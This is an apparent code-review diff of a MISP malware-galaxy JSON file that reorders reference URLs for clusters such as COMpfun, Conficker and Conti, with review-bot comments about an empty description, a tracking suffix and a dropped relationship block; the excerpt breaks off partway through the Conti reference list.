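Review bot: the new CommonMagic cluster ships with "description": "" and "type": [], although the win.common_magic Malpedia page it links to and the securelist bad-magic-apt write-up both exist and would supply at least a one-line description; an empty description makes the cluster useless in the MISP UI beyond its name. Also strip the tracking suffix from "https://securelist.com/bad-magic-apt/109087/?s=31", which is the same resource as the bare path and will otherwise create a near-duplicate the next time the ref is re-scraped without it.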
@@ -18010,26 +19119,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun",
- "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
- "https://securelist.com/compfun-successor-reductor/93633/",
"https://securelist.com/it-threat-evolution-q2-2020/98230",
+ "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://securelist.com/compfun-http-status-based-trojan/96874/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://securelist.com/compfun-successor-reductor/93633/"
],
"synonyms": [
"Reductor RAT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "b2c2d42b-a6a3-4ab0-a013-eb1c7461aca9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "541d5642-0648-4b5a-97b9-81110f273771",
"value": "COMpfun"
},
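Review bot: same concern as for Combos above: the "related" block linking COMpfun to dest-uuid b2c2d42b-a6a3-4ab0-a013-eb1c7461aca9 as "similar" is dropped while the rest of the cluster (uuid 541d5642-0648-4b5a-97b9-81110f273771, synonym "Reductor RAT") is unchanged. Either the target has been removed from its galaxy, in which case note it in the commit, or this is an unintended side effect of regenerating from Malpedia, in which case the relationship should be preserved across refreshes rather than re-added by hand later.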
@@ -18038,10 +19138,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace",
+ "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/",
"https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
"https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/"
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight"
],
"synonyms": [
"lojack"
@@ -18083,15 +19183,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
- "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
- "https://www.minitool.com/backup-tips/conficker-worm.html",
- "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "http://contagiodump.blogspot.com/2009/05/win32conficker.html",
"https://github.com/tillmannw/cnfckr",
- "https://redcanary.com/blog/intelligence-insights-january-2022/"
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Conficker/Conficker.md",
+ "https://www.minitool.com/backup-tips/conficker-worm.html",
+ "http://contagiodump.blogspot.com/2009/05/win32conficker.html",
+ "https://redcanary.com/blog/intelligence-insights-january-2022/",
+ "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
+ "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
+ "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [
"Kido",
@@ -18108,10 +19208,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
- "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/"
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
+ "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html"
],
"synonyms": [],
"type": []
@@ -18124,188 +19224,197 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.conti",
- "https://github.com/TheParmak/conti-leaks-englished",
- "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
- "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
- "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
- "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
- "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
- "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://www.mbsd.jp/research/20210413/conti-ransomware/",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
"https://securelist.com/luna-black-basta-ransomware/106950",
- "https://twitter.com/TheDFIRReport/status/1498642512935800833",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
- "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
- "https://www.prevailion.com/what-wicked-webs-we-unweave/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
"https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
- "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
+ "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
+ "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
+ "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
+ "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html",
+ "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
"https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://github.com/whichbuffer/Conti-Ransomware-IOC",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
+ "https://www.connectwise.com/resources/conti-profile",
+ "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
"http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
"https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://share.vx-underground.org/Conti/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
- "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
- "https://www.youtube.com/watch?v=hmaWy9QIC7c",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
- "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
"https://intel471.com/blog/conti-leaks-cybercrime-fire-team",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
"https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
- "https://intel471.com/blog/shipping-companies-ransomware-credentials",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
- "https://www.youtube.com/watch?v=uORuVVQzZ0A",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
- "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
- "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA",
- "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
- "https://github.com/whichbuffer/Conti-Ransomware-IOC",
- "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
- "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
- "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
- "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
- "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.ic3.gov/Media/News/2021/210521.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
- "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
- "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
- "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://github.com/cdong1012/ContiUnpacker",
- "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
- "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
"https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
"https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
- "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
- "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
- "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
- "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
- "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
- "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
- "https://www.connectwise.com/resources/conti-profile",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
